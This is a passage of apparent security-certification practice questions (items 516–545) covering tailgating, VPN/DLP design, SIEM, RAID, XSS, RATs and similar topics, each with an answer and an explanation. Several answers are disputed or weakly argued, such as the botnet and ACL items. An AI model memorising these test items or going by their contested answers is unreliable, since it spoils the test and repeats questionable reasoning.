D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Explanation:
Mimikatz is a tool commonly used to extract plaintext passwords from memory. If users received new flash drives that are potentially malicious (not from the company or tampered with), they could be attempting to bypass Group Policy Object (GPO) restrictions and exploit vulnerabilities to gather sensitive information like plaintext credentials. This scenario aligns with the AV alerts indicating Mimikatz activity, suggesting a potential security breach involving unauthorized or compromised flash drives attempting to bypass security controls.

516
Q

A company has installed badge readers for building access but is finding unauthorized individuals roaming the hallways. Which of the following is the most likely cause?

A. Shoulder surfing
B. Phishing
C. Tailgating
D. Identity fraud

A

C. Tailgating

Explanation:
Tailgating refers to the practice of unauthorized individuals following closely behind an authorized person to gain entry into a restricted area. In this scenario, despite badge readers being in place for building access, unauthorized individuals are able to enter the premises by closely following behind authorized personnel as they pass through controlled entry points. This is a common physical security issue where the effectiveness of access controls like badge readers is undermined by individuals not properly verifying their own access.

517
Q

An organization routes all of its traffic through a VPN. Most users are remote and connect into a corporate data center that houses confidential information. There is a firewall at the internet border, followed by a DLP appliance, the VPN server, and the data center itself. Which of the following is the weakest design element?

A. The DLP appliance should be integrated into a NGFW.
B. Split-tunnel connections can negatively impact the DLP appliance’s performance.
C. Encrypted VPN traffic will not be inspected when entering or leaving the network.
D. Adding two hops in the VPN tunnel may slow down remote connections.

A

C. Encrypted VPN traffic will not be inspected when entering or leaving the network.

Explanation:
In the given network design, the weakest element is that encrypted VPN traffic bypasses inspection by the DLP (Data Loss Prevention) appliance. VPNs typically encrypt traffic to secure it from eavesdropping and tampering, which is a security benefit. However, this encryption also prevents deep packet inspection (DPI) by devices like DLP appliances unless they are specifically configured to decrypt and inspect traffic, which can be complex and resource-intensive. This lack of inspection for encrypted VPN traffic means that potential data leaks or policy violations within the encrypted traffic may go undetected, weakening the overall security posture of the network.

518
Q

Which of the following is the best method for ensuring non-repudiation?

A. SSO
B. Digital certificate
C. Token
D. SSH key

A

B. Digital certificate

Non-repudiation ensures that a party cannot deny the authenticity or integrity of a message or transaction that they have sent or received. Digital certificates play a crucial role in achieving non-repudiation by providing a trusted means to verify the identity of the sender or recipient in electronic communications. When digital signatures are used, which rely on digital certificates, they provide strong evidence of who sent a message and that the message content has not been altered since it was signed. This helps to ensure non-repudiation in digital transactions.

519
Q

Which of the following methods is the most effective for reducing vulnerabilities?

A. Joining an information-sharing organization
B. Using a scan-patch-scan process
C. Implementing a bug bounty program
D. Patching low-scoring vulnerabilities first

A

B. Using a scan-patch-scan process

Using a scan-patch-scan process is the most effective method for reducing vulnerabilities among the options provided. Here’s why:

Scan: Conducting regular vulnerability scans helps identify vulnerabilities in systems and applications.
Patch: Applying patches promptly to fix known vulnerabilities is crucial to prevent exploitation by attackers.
Scan again: After patching, conducting another scan ensures that the vulnerabilities have been effectively mitigated and no new issues have been introduced.

This process ensures a systematic approach to vulnerability management, reducing the window of opportunity for attackers to exploit known vulnerabilities. It is a proactive approach that focuses on maintaining the security posture of systems and networks.

520
Q

An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and monitoring of remote employee internet traffic. Which of the following will help achieve these objectives?

A. Deploying a SASE solution to remote employees
B. Building a load-balanced VPN solution with redundant internet
C. Purchasing a low-cost SD-WAN solution for VPN traffic
D. Using a cloud provider to create additional VPN concentrators

A

(Community A 93%)

A. Deploying a SASE (Secure Access Service Edge) solution to remote employees

A SASE solution is designed to address the exact needs described in the scenario:

Reducing VPN and internet circuit traffic: SASE solutions can optimize traffic by routing it through the closest point of presence (PoP), reducing the load on the VPN concentrator and internet circuit.

Providing encrypted tunnel access: SASE solutions include built-in encryption and secure tunnels to ensure data remains protected during transit between remote employees and the data center.

Monitoring remote employee internet traffic: SASE solutions often include comprehensive visibility and monitoring capabilities, allowing organizations to monitor and manage internet traffic from remote employees effectively.

Therefore, deploying a SASE solution aligns well with the organization’s objectives of reducing VPN and internet circuit traffic while maintaining secure and monitored access for remote employees.

521
Q

Which of the following is the best reason to complete an audit in a banking environment?

A. Regulatory requirement
B. Organizational change
C. Self-assessment requirement
D. Service-level requirement

A

A. Regulatory requirement

In a banking environment, completing an audit is often driven by regulatory requirements. Banks are heavily regulated to ensure financial stability, protect customer data, and maintain compliance with industry standards and laws. Regulatory audits help ensure that banks adhere to these requirements, assess their internal controls, and verify the accuracy and integrity of financial reporting. Therefore, a regulatory requirement is typically the primary reason for conducting audits in banking environments.

522
Q

After a recent ransomware attack on a company’s system, an administrator reviewed the log files. Which of the following control types did the administrator use?

A. Compensating
B. Detective
C. Preventive
D. Corrective

A

B. Detective

In this scenario, the administrator reviewed log files after the ransomware attack. Detective controls are designed to detect and respond to security incidents and events as they occur. Reviewing log files after an attack falls under detective controls because it involves monitoring and analyzing system logs to identify signs of unauthorized access or malicious activities.

523
Q

A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?

A. Air gap the system.
B. Move the system to a different network segment.
C. Create a change control request.
D. Apply the patch to the system.

A

C. Create a change control request.

Before applying a high-priority patch to a production system, it is crucial to follow change management processes. Creating a change control request ensures that the patch deployment is documented, approved, and tracked according to organizational policies and procedures. This helps to mitigate risks associated with the patching process and ensures that appropriate stakeholders are informed and involved in the change management process. Therefore, creating a change control request is the first step that should be taken in this scenario.

524
Q

A security analyst reports a company policy violation in a case in which a large amount of sensitive data is being downloaded after hours from various mobile devices to an external site. Upon further investigation, the analyst notices that successful login attempts are being conducted with impossible travel times during the same time periods when the unauthorized downloads are occurring. The analyst also discovers a couple of WAPs are using the same SSID, but they have non-standard DHCP configurations and an overlapping channel. Which of the following attacks is being conducted?

A. Evil twin
B. Jamming
C. DNS poisoning
D. Bluesnarfing
E. DDoS

A

(Community : A 100%)
A. Evil twin

In this scenario, the presence of WAPs (Wireless Access Points) with the same SSID (Service Set Identifier) but with non-standard DHCP configurations and an overlapping channel suggests the possibility of an evil twin attack. An evil twin attack involves setting up a rogue wireless access point that mimics a legitimate network to trick users into connecting to it. Once connected, the attacker can intercept traffic, capture credentials, and perform other malicious activities, including unauthorized data transfers.

The impossible travel times during login attempts further indicate potential credential harvesting or unauthorized access, which aligns with the tactics used in an evil twin attack to steal credentials and access sensitive data.

Therefore, based on the information provided, the attack being conducted is most likely an evil twin attack.

525
Q

Several users have opened tickets with the help desk. The help desk has reassigned the tickets to a security analyst for further review. The security analyst reviews the following metrics:

Hostname Normal CPU Current CPU Normal network Current network
Utilization % Utilization % connections connections
Accounting-PC 22% 48% 12 66
HR-PC 35% 55% 15 57
IT-PC 78% 98% 25 92
Sales-PC 28% 50% 20 56
Manager-PC 21% 44% 18 49

Which of the following is most likely the result of the security analyst’s review?

A. The ISP is dropping outbound connections.
B. The user of the Sales-PC fell for a phishing attack
C. Corporate PCs have been turned into a botnet.
D. An on-path attack is taking place between PCs and the router.

A

C. Corporate PCs have been turned into a botnet.

Based on the metrics provided:

Normal CPU Utilization: Shows the typical CPU usage percentage.
Current CPU Utilization: Shows the current (potentially abnormal) CPU usage percentage.
Normal network connections: Shows the typical number of network connections.
Current network connections: Shows the current (potentially abnormal) number of network connections.

The IT-PC stands out with significantly higher current CPU utilization (98% compared to a normal of 78%) and a much higher number of current network connections (92 compared to a normal of 25). These metrics suggest that the IT-PC is exhibiting behavior indicative of being compromised or potentially participating in malicious activities, such as being part of a botnet.

Therefore, the most likely result of the security analyst’s review is:

C. Corporate PCs have been turned into a botnet.

This conclusion is drawn based on the abnormal metrics of the IT-PC, which indicate it may be under the control of malicious actors or compromised in some way, potentially being used as part of a botnet to conduct unauthorized activities.

526
Q

An engineer needs to deploy a security measure to identify and prevent data tampering within the enterprise. Which of the following will accomplish this goal?

A. Antivirus
B. IPS
C. FTP
D. FIM

A

D. FIM (File Integrity Monitoring)

File Integrity Monitoring (FIM) tools are designed to monitor and detect changes to files and directories. They maintain a record of file attributes and alert administrators to unauthorized modifications, ensuring the integrity of critical system and data files. This helps in identifying any tampering or unauthorized changes to files within the enterprise environment.

Let’s break down the other options in the context of identifying and preventing data tampering:

A. Antivirus (AV):
Antivirus software is primarily designed to detect and remove malicious software (malware) such as viruses, worms, and Trojans. While it can prevent certain types of data tampering by detecting malware that modifies files, its primary focus is on detecting and mitigating malware threats rather than detecting unauthorized changes to data itself.

B. IPS (Intrusion Prevention System):
An IPS is designed to monitor network traffic and detect/prevent potential intrusions or attacks based on predefined signatures or behavior anomalies. While it can help prevent unauthorized access and protect against some types of network-based attacks, its role is more focused on network security rather than detecting data tampering specifically.

C. FTP (File Transfer Protocol):
FTP is a protocol used for transferring files over a network. While it facilitates data transfer, it does not inherently provide mechanisms for detecting or preventing data tampering. FTP itself is a method of data exchange rather than a security measure designed to protect against tampering.

Therefore, among the options provided, FIM (File Integrity Monitoring) remains the most appropriate choice specifically for identifying and preventing data tampering within the enterprise environment.

527
Q

Which of the following mitigation techniques places devices in physically or logically separated networks and leverages policies to limit the types of communications that are allowed?

A. Host-based firewalls
B. Access control list
C. Port security
D. Least privilege

A

B. Access control list

Explanation:

Access control lists (ACLs) are used to enforce network segmentation by placing devices in physically or logically separated networks (segments or VLANs) and controlling the types of communications allowed between them. ACLs are typically configured on routers, switches, or firewalls and specify which IP addresses, protocols, and ports are permitted or denied to pass through a network interface. This helps limit the scope of communications and restrict unauthorized access between different segments of the network, thereby enhancing network security.

let’s review the other choices:

A. Host-based firewalls:

Host-based firewalls operate at the individual device level, not at the network level. They control incoming and outgoing traffic to and from the device they are installed on, based on predefined rules. While they can provide some level of isolation and protection for the device they are installed on, they do not directly address network segmentation.

C. Port security:

Port security refers to measures taken to limit and control access to network switch ports. It involves configuring switches to allow only specific MAC addresses to access the network through certain ports. Port security focuses on preventing unauthorized devices from connecting to the network via physical switch ports, but it does not inherently provide network segmentation or control over communications between logically separated networks.

D. Least privilege:

Least privilege principle refers to granting users or processes only the minimum privileges necessary to perform their tasks. While it is a fundamental security principle for access control, it pertains more to user and process permissions rather than network segmentation or controlling communications between networks.

(Braindump: A. Host-based firewalls)

528
Q

All security analysts’ workstations at a company have network access to a critical server VLAN. The information security manager wants to further enhance the controls by requiring that all access to the secure VLAN be authorized only from a given single location. Which of the following will the information security manager most likely implement?

A. A forward proxy server
B. A jump server
C. A reverse proxy server
D. A stateful firewall server

A

B. A jump server
Explanation:

Jump Server:
    A jump server (or jump box) is a dedicated device through which access to the secure VLAN is funneled. Analysts must first connect to the jump server, which then provides controlled and logged access to the critical server VLAN. This ensures that all access comes from a single, controlled point, enhancing security and providing better monitoring and auditing capabilities.

Why Not the Other Options?

A. Forward Proxy Server:
    A forward proxy server is typically used to forward client requests to the internet or external networks and often for purposes like caching, content filtering, and anonymity. It is not designed to control access to a specific internal network segment.

C. Reverse Proxy Server:
    A reverse proxy server sits in front of web servers to intercept requests from clients and forward them to the appropriate backend server. It helps with load balancing, security, and caching for web applications, but it is not suited for controlling access from internal workstations to a secure VLAN.

D. Stateful Firewall Server:
    A stateful firewall server can control access based on IP addresses, ports, and protocols and keep track of the state of active connections. While it enhances security, it does not enforce access from a single location. It is more about controlling types of traffic and monitoring connections rather than ensuring a single point of entry.

In summary, a jump server is specifically designed to act as a single access point for connecting to more secure or restricted network segments, making it the best choice for this scenario.

529
Q

Which of the following best describes why a company would erase a newly purchased device and install its own image with an operating system and applications?

A. Installing a new operating system thoroughly tests the equipment
B. Removing unneeded applications reduces the system’s attack surface
C. Reimaging a system creates an updated baseline of the computer image
D. Wiping the device allows the company to evaluate its performance

A

B. Removing unneeded applications reduces the system’s attack surface
Explanation:

Reducing Attack Surface:
    When a company erases a newly purchased device and installs its own image, the primary goal is often to ensure that only the necessary applications and configurations are present. This process eliminates pre-installed software (often called bloatware) and other unnecessary applications that could introduce vulnerabilities or be exploited by attackers. By minimizing the number of applications and services running on the device, the overall attack surface is reduced, enhancing security.

Why Not the Other Options?

A. Installing a new operating system thoroughly tests the equipment:
    While installing a new operating system might help test the equipment to some extent, it is not the primary reason for erasing and reimaging a device. The main goal is to ensure security and consistency.

C. Reimaging a system creates an updated baseline of the computer image:
    Although reimaging can help establish a consistent and updated baseline, the primary reason is still to remove unnecessary applications and potential security risks, thereby reducing the attack surface.

D. Wiping the device allows the company to evaluate its performance:
    Evaluating performance is not typically the main reason for reimaging a device. The focus is on security, control, and ensuring the device conforms to the company’s standards and policies.

In summary, the best reason a company would erase a newly purchased device and install its own image is to reduce the system’s attack surface by removing unneeded applications.

530
Q

A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced when the latest container image version was downloaded from a publicregistry. Which of the following is the best solution to prevent this type of incident from occurring again?

A. Enforce the use of a controlled trusted source of container images.
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers.
C. Define a vulnerability scan to assess container images before being introduced on the environment.
D. Create a dedicated VPC for the containerized environment.

A

A. Enforce the use of a controlled trusted source of container images.
Explanation:

Controlled Trusted Source:
    By enforcing the use of a controlled and trusted source of container images, the organization can ensure that all container images are vetted and verified before they are used in the production environment. This significantly reduces the risk of introducing zero-day vulnerabilities or malicious backdoors that might be present in images from untrusted public registries.

Why Not the Other Options?

B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers:
    While deploying an Intrusion Prevention System (IPS) can help detect and prevent known attacks, it may not be effective against zero-day vulnerabilities for which signatures do not yet exist. Additionally, it does not address the root cause of the issue—using untrusted container images.

C. Define a vulnerability scan to assess container images before being introduced on the environment:
    Defining and running vulnerability scans on container images is an important step, but it may not catch all zero-day vulnerabilities, as these are unknown at the time of scanning. While useful, this approach alone is insufficient without ensuring the images come from a trusted source.

D. Create a dedicated VPC for the containerized environment:
    Creating a dedicated Virtual Private Cloud (VPC) can help isolate the containerized environment and improve security, but it does not prevent the introduction of vulnerabilities through untrusted container images. It is more of a network segmentation strategy rather than a solution to the root cause.

In summary, enforcing the use of a controlled trusted source of container images is the best solution to prevent the introduction of zero-day vulnerabilities from untrusted public registries, addressing the root cause of the problem.

531
Q

An external forensics investigator has been hired to investigate a data breach at a large enterprise with numerous assets. It is known that the breach started in the perimeter network and moved to the sensitive information, generating multiple logs as the attacker traversed through the network. Which of the following will best assist with this investigation?

A. Perform a vulnerability scan to identify the weak spots.
B. Use a packet analyzer to investigate the NetFlow traffic.
C. Check the SIEM to review the correlated logs.
D. Require access to the routers to view current sessions.

A

C. Check the SIEM to review the correlated logs.
Explanation:

Security Information and Event Management (SIEM):
    A SIEM system collects, correlates, and analyzes logs from various sources across the network. This provides a comprehensive view of the activities and events that occurred during the breach. By reviewing the correlated logs, the investigator can trace the attacker's steps, identify patterns, and understand how the breach propagated through the network. This holistic view is crucial for understanding the full scope of the breach and identifying the affected assets.

Why Not the Other Options?

A. Perform a vulnerability scan to identify the weak spots:
    While a vulnerability scan can identify potential weaknesses in the network, it does not provide the historical data needed to investigate how the breach occurred or trace the attacker's movements.

B. Use a packet analyzer to investigate the NetFlow traffic:
    A packet analyzer can provide detailed information about network traffic, but it may be overwhelming to analyze large volumes of traffic data without the context provided by correlated logs. It is more useful for specific traffic analysis rather than understanding the overall breach.

D. Require access to the routers to view current sessions:
    Viewing current sessions on routers can provide information about ongoing connections, but it does not help in understanding the historical context of the breach. It also does not provide a comprehensive view of the attacker's activities throughout the network.

In summary, checking the SIEM to review the correlated logs is the best approach for a comprehensive investigation of the data breach, as it provides a detailed and correlated view of the attacker’s activities across the network.

532
Q

A Chief Information Security Officer (CISO) needs to create a policy set that meets international standards for data privacy and sharing. Which of the following should the CISO read and understand before writing the policies?

A. PCI DSS
B. GDPR
C. NIST
D. ISO 31000

A

B. GDPR
Explanation:

General Data Protection Regulation (GDPR):
    GDPR is a comprehensive data protection regulation enacted by the European Union that sets standards for data privacy and protection for individuals within the EU. It also addresses the export of personal data outside the EU. Given its international impact and stringent requirements for data privacy and sharing, it is crucial for the CISO to understand GDPR when creating policies that meet international standards for data privacy.

Why Not the Other Options?

A. PCI DSS:
    The Payment Card Industry Data Security Standard (PCI DSS) is focused on securing credit card transactions and protecting cardholder data. While important for financial data security, it is not as broad in scope as GDPR regarding overall data privacy and sharing.

C. NIST:
    The National Institute of Standards and Technology (NIST) provides a cybersecurity framework and guidelines primarily used within the United States. While useful for developing cybersecurity policies, it does not specifically address international data privacy laws like GDPR.

D. ISO 31000:
    ISO 31000 is a standard for risk management and provides guidelines for risk management processes. It is not specifically focused on data privacy and protection standards.

In summary, understanding GDPR is essential for the CISO to create a policy set that aligns with international standards for data privacy and sharing.

533
Q

During an internal penetration test, a security analyst identified a network device that had accepted cleartext authentication and was configured with a default credential. Which of the following recommendations should the security analyst make to secure this device?

A. Configure SNMPv1.
B. Configure SNMPv2c.
C. Configure SNMPv3.
D. Configure the default community string.

A

C. Configure SNMPv3.
Explanation:

SNMPv3 (Simple Network Management Protocol version 3):
    SNMPv3 provides enhanced security features, including encryption and authentication, to protect data being transmitted and to ensure that only authorized users can access the SNMP data. By configuring SNMPv3, the security analyst can secure the device against cleartext authentication and ensure that default credentials are no longer a security risk.

Why Not the Other Options?

A. Configure SNMPv1:
    SNMPv1 does not support encryption or authentication, and all data, including credentials, is transmitted in cleartext. This does not address the security issues identified.

B. Configure SNMPv2c:
    SNMPv2c offers some improvements over SNMPv1 but still lacks robust security features like encryption and proper authentication. It also transmits data, including credentials, in cleartext.

D. Configure the default community string:
    Changing the default community string can help improve security but does not address the issue of cleartext authentication. It is a partial measure and not as secure as implementing SNMPv3.

In summary, configuring SNMPv3 is the best recommendation to secure the device as it provides encryption and authentication features that protect against cleartext authentication and the use of default credentials.

534
Q

Developers are writing code and merging it into shared repositories several times a day, where it is tested automatically. Which of the following concepts does this best represent?

A. Functional testing
B. Stored procedures
C. Elasticity
D. Continuous integration

A

D. Continuous integration
Explanation:

Continuous Integration (CI):
    CI is a software development practice where developers frequently integrate their code changes into a shared repository. Each integration is automatically verified by building the application and running tests to detect errors as quickly as possible. This practice aims to improve software quality and reduce the time taken to deliver new software updates.

Why Not the Other Options?

A. Functional testing:
    Functional testing involves testing the functionality of the software to ensure it behaves as expected. While functional tests may be part of the CI process, they do not encompass the entire concept of continuously integrating code.

B. Stored procedures:
    Stored procedures are precompiled collections of SQL statements stored in a database. They are used for database operations but are not related to the practice of integrating and testing code frequently.

C. Elasticity:
    Elasticity refers to the ability of a system to dynamically adjust its resources to handle varying loads, often in the context of cloud computing. It is not related to the practice of continuous integration in software development.

In summary, the practice of developers writing code and merging it into shared repositories several times a day, where it is tested automatically, best represents continuous integration.

535
Q

A large financial services firm recently released information regarding a security breach within its corporate network that began several years before. During the time frame in which the breach occurred, indicators show an attacker gained administrative access to the network through a file downloaded from a social media site and subsequently installed it without the user’s knowledge. Since the compromise, the attacker was able to take command and control of the computer systems anonymously while obtaining sensitive corporate and personal employee information. Which of the following methods did the attacker most likely use to gain access?

A. A bot
B. A fileless virus
C. A logic bomb
D. A RAT

A

D. A RAT
Explanation:

Remote Access Trojan (RAT):
    A RAT is a type of malware that gives the attacker full control over the infected computer. It often remains undetected and can perform a variety of tasks, such as stealing information, installing other malware, and controlling the system remotely. In this scenario, the attacker gaining administrative access, taking command and control of the systems, and obtaining sensitive information fits the behavior of a RAT.

Why Not the Other Options?

A. A bot:
    A bot is typically part of a botnet and is used for tasks like DDoS attacks, spamming, or mining cryptocurrencies. While a bot can perform some malicious activities, it doesn't fully explain the detailed control and information theft described in the scenario.

B. A fileless virus:
    A fileless virus operates in memory and doesn't leave traditional footprints on the file system, making it hard to detect. While it could have been used to gain initial access, the detailed and prolonged control over systems described in the scenario is more characteristic of a RAT.

C. A logic bomb:
    A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when certain conditions are met. Logic bombs are typically used for specific timed attacks or when certain conditions are met, but they do not provide ongoing control over a system.

In summary, the prolonged, detailed control over the systems and the ability to steal sensitive information as described in the scenario are most characteristic of a Remote Access Trojan (RAT).

536
Q

Recent changes to a company’s BYOD policy require all personal mobile devices to use a two-factor authentication method that is not something you know or have. Which of the following will meet this requirement?

A. Facial recognition
B. Six-digit PIN
C. PKI certificate
D. Smart card

A

A. Facial recognition
Explanation:

Facial recognition:
    This is a biometric authentication method that relies on something you are (your face) rather than something you know (like a PIN) or something you have (like a smart card or PKI certificate). It fits the requirement for a two-factor authentication method that is neither something you know nor something you have.

Why Not the Other Options?

B. Six-digit PIN:
    A PIN is something you know, which does not meet the requirement.

C. PKI certificate:
    A PKI certificate is something you have, which does not meet the requirement.

D. Smart card:
    A smart card is also something you have, which does not meet the requirement.

In summary, facial recognition is the only option that fits the requirement for a two-factor authentication method that is neither something you know nor something you have, as it relies on biometric data (something you are).

537
Q

A critical file server is being upgraded, and the systems administrator must determine which RAID level the new server will need to achieve parity and handle two simultaneous disk failures. Which of the following RAID levels meets this requirement?

A. RAID 0+1
B. RAID 2
C. RAID 5
D. RAID 6

A

D. RAID 6
Explanation:

RAID 6 is designed to provide redundancy that can withstand the failure of up to two disk drives simultaneously.
In RAID 6, data is striped across multiple drives, and parity information is distributed across all drives.
This allows for recovery from the failure of any two drives without data loss.
RAID 6 requires a minimum of four drives and uses two parity blocks per stripe.

Why Not the Other Options?

RAID 0+1 (RAID 10):
    RAID 0+1 combines features of RAID 0 (striping) and RAID 1 (mirroring).
    It can handle the failure of a single drive in each mirrored pair but not two simultaneous failures in different pairs.

RAID 2:
    RAID 2 uses Hamming code for error correction but is rarely used due to its complexity and lack of practical application in modern systems.

RAID 5:
    RAID 5 stripes data across multiple drives and uses parity to provide fault tolerance.
    It can handle the failure of one drive without data loss but is vulnerable to data loss if two drives fail simultaneously during rebuild.

Therefore, RAID 6 is the appropriate choice when the requirement is to achieve parity and handle two simultaneous disk failures with redundancy and data protection.

538
Q

A company must ensure sensitive data at rest is rendered unreadable. Which of the following will the company most likely use?

A. Hashing
B. Tokenization
C. Encryption
D. Segmentation

A

C. Encryption

Encryption is the process of encoding data in such a way that only authorized parties can access it. It is commonly used to ensure that sensitive data at rest (stored data) remains unreadable to unauthorized users or attackers who might gain access to the storage medium. Here’s why encryption fits the requirement:

Encryption transforms plaintext (readable data) into ciphertext (unreadable data) using an algorithm and a cryptographic key.
Authorized users with the correct decryption key can reverse the encryption process to access the original plaintext data.
It provides strong protection against unauthorized access, ensuring that even if data storage is compromised, the encrypted data remains secure.

Why Not the Other Options?

Hashing (Option A): Hashing is a one-way process that generates a fixed-size string (hash value) from input data. It is used primarily for data integrity verification and does not provide a way to reverse the process to retrieve the original data. Therefore, it does not render data unreadable but rather validates data integrity.

Tokenization (Option B): Tokenization substitutes sensitive data with a non-sensitive placeholder (token). Tokens are typically mapped to sensitive data stored in a secure vault or database. While it enhances security by reducing exposure of sensitive data, it is not primarily used to render data unreadable in storage but rather during transmission or processing.

Segmentation (Option D): Segmentation refers to dividing a network into smaller segments to reduce traffic congestion and improve security management. It does not directly apply to rendering data at rest unreadable.

Therefore, encryption is the method most suitable for ensuring that sensitive data at rest remains unreadable to unauthorized individuals or entities.

539
Q

A security assessment found that several embedded systems are running unsecure protocols. These systems were purchased two years ago, and the company that developed them is no longer in business. Which of the following constraints best describes the reason the findings cannot be remediated?

A. Inability to authenticate
B. Implied trust
C. Lack of computing power
D. Unavailable patch

A

D. Unavailable patch

The reason the findings cannot be remediated in this scenario is due to the unavailability of patches. Since the company that developed the embedded systems is no longer in business:

Patches are updates or fixes provided by software vendors to address security vulnerabilities or bugs in their products.
Without the original vendor's support or availability, there will be no new patches or updates released for the embedded systems.
As a result, any security vulnerabilities identified in these systems that require patches to fix cannot be addressed, leaving them exposed to potential exploitation.

Why Not the Other Options?

Inability to authenticate (Option A): This typically refers to issues related to verifying the identity of users or systems. While authentication may be a concern, it does not directly prevent the application of security patches.

Implied trust (Option B): Implied trust relates to assumptions made about the trustworthiness of systems or entities. It does not directly relate to the inability to apply patches due to vendor unavailability.

Lack of computing power (Option C): This constraint refers to insufficient hardware resources to perform certain tasks. While it can be a limitation, it does not prevent the installation of patches if they were available.

Therefore, unavailable patch (Option D) is the most relevant constraint in this scenario, as it directly addresses the inability to remediate security vulnerabilities in the embedded systems due to the absence of support from the original vendor.

540
Q

A security engineer is concerned about using an agent on devices that relies completely on defined known-bad signatures. The security engineer wants to implement a tool with multiple components including the ability to track, analyze, and monitor devices without reliance on definitions alone. Which of the following solutions best fits this use case?

A. EDR
B. DLP
C. NGFW
D. HIPS

A

A. EDR (Endpoint Detection and Response)

EDR (Endpoint Detection and Response) solutions are designed to provide continuous monitoring, analysis, and response capabilities on endpoints. They go beyond traditional antivirus solutions that rely on known-bad signatures by offering:

Behavioral analysis: EDR solutions monitor endpoint behavior in real-time to detect suspicious activities and anomalies.

Endpoint visibility: They provide detailed visibility into endpoint activities, processes, and network connections.

Threat hunting: EDR allows security teams to proactively search for indicators of compromise (IOCs) and potential threats across endpoints.

Response capabilities: EDR platforms often include response features such as quarantine, containment, and automated response actions to mitigate threats.

In contrast to solutions like DLP (Data Loss Prevention), NGFW (Next-Generation Firewall), and HIPS (Host-based Intrusion Prevention System), EDR is specifically tailored to monitor and respond to endpoint security incidents based on behavior and context rather than relying solely on predefined signatures of known threats. Therefore, for the described use case where the security engineer wants a solution that tracks, analyzes, and monitors devices without relying solely on known-bad signatures, EDR would be the most suitable choice.

541
Q

A user’s login credentials were recently compromised. During the investigation, the security analyst determined the user input credentials into a pop-up window when prompted to confirm the username and password. However, the trusted website does not use a pop-up for entering user credentials. Which of the following attacks occurred?

A. Cross-site scripting
B. SQL injection
C. DNS poisoning
D. Certificate forgery

A

A. Cross-site scripting (XSS)

Here’s why:

Cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users. One common form of XSS is when an attacker injects scripts into a legitimate website, which then prompts users to enter their credentials into a fake pop-up window.

In this scenario, the user was prompted to input credentials into a pop-up window, but the legitimate website does not use such pop-ups for credential input. This indicates that an attacker likely injected a malicious script (via XSS) into the website to trick users into disclosing their login credentials.

SQL injection (B) involves inserting SQL code into a form field to manipulate the database. It doesn't directly involve prompting users with fake login prompts.

DNS poisoning (C) involves corrupting the DNS cache to redirect domain name queries to malicious sites, not directly related to the description.

Certificate forgery (D) involves creating fake digital certificates to impersonate a legitimate website, not directly related to the described scenario.

Therefore, based on the given details, Cross-site scripting (XSS) is the most appropriate answer.

542
Q

To reduce costs and overhead, an organization wants to move from an on-premises email solution to a cloud-based email solution. At this time, no other services will be moving. Which of the following cloud models would best meet the needs of the organization?

A. MaaS
B. IaaS
C. SaaS
D. PaaS

A

C. SaaS (Software as a Service)

Explanation:

SaaS (Software as a Service) provides software applications delivered over the internet, usually on a subscription basis. In this case, the organization can subscribe to a cloud-based email service where the email application is hosted and managed by the service provider.
SaaS eliminates the need for the organization to manage and maintain email servers, reducing costs associated with hardware, software licenses, and IT staff overhead.
With SaaS, the organization can access the email service from anywhere via the internet, benefiting from scalability, reliability, and typically lower upfront costs compared to on-premises solutions.

Other options:

MaaS (Monitoring as a Service) typically refers to cloud-based monitoring services, not relevant for email services.
IaaS (Infrastructure as a Service) provides virtualized computing resources over the internet, such as virtual machines and storage. It does not focus on delivering software applications like email services.
PaaS (Platform as a Service) provides a platform allowing customers to develop, run, and manage applications without the complexity of building and maintaining the underlying infrastructure. While it could potentially host custom applications including email services, it's not specifically tailored for standalone email solutions like SaaS.

Therefore, SaaS is the most appropriate choice for the organization’s need to migrate to a cloud-based email solution while reducing costs and overhead.

543
Q

A software development manager wants to ensure the authenticity of the code created by the company. Which of the following options is the most appropriate?

A. Testing input validation on the user input fields
B. Performing code signing on company-developed software
C. Performing static code analysis on the software
D. Ensuring secure cookies are used

A

B. Performing code signing on company-developed software

Here’s why:

Code Signing: Code signing involves digitally signing software to confirm its authenticity and integrity. It provides a way for users and systems to verify that the software they are installing or executing comes from a trusted source and has not been tampered with since it was signed.

Authenticity Assurance: By using code signing, the software development manager can ensure that the code produced by the company is authenticated. This helps in building trust with users and customers who rely on the software.

Security and Integrity: Code signing helps in verifying that the code has not been altered or compromised during distribution or deployment. This is crucial for maintaining the integrity of the software and protecting against unauthorized modifications.

While options like testing input validation (A), performing static code analysis (C), and ensuring secure cookies (D) are important security practices, they do not directly address the issue of code authenticity as effectively as code signing (option B) does.

544
Q

An organization is having difficulty correlating events from its individual AV, EDR, DLP, SWG, WAF, MDM, HIPS, and CASB systems. Which of the following is the best way to improve the situation?

A. Remove expensive systems that generate few alerts.
B. Modify the systems to alert only on critical issues.
C. Utilize a SIEM to centralize logs and dashboards.
D. Implement a new syslog/NetFlow appliance.

A

C. Utilize a SIEM to centralize logs and dashboards.

Here’s why:

SIEM (Security Information and Event Management): A SIEM system is designed to centralize the collection, normalization, correlation, and analysis of security-related data from various sources. It aggregates logs and events from disparate systems into a single platform, providing a unified view of the organization's security posture.

Correlation and Analysis: SIEM systems use correlation rules and algorithms to detect patterns and anomalies across different logs and events. This enables security teams to identify potential security incidents or threats that may span multiple systems.

Centralized Management: By using a SIEM, organizations can streamline their incident detection and response processes. Security analysts can investigate incidents more efficiently with centralized dashboards and tools for monitoring and managing security events.

Option A (removing expensive systems that generate few alerts) and option B (modifying systems to alert only on critical issues) may not be ideal because they could overlook important security events that don’t meet the predefined criteria. Option D (implementing a new syslog/NetFlow appliance) addresses part of the issue by improving log collection, but it doesn’t provide the advanced correlation and analysis capabilities offered by a SIEM.

Therefore, option C (utilizing a SIEM to centralize logs and dashboards) is the most effective solution for improving the correlation of events across multiple security systems in the organization.

545
Q

A company’s end users are reporting that they are unable to reach external websites. After reviewing the performance data for the DNS severs, the analyst discovers that the CPU, disk, and memory usage are minimal, but the network interface is flooded with inbound traffic. Network logs show only a small number of DNS queries sent to this server. Which of the following best describes what the security analyst is seeing?

A. Concurrent session usage
B. Secure DNS cryptographic downgrade
C. On-path resource consumption
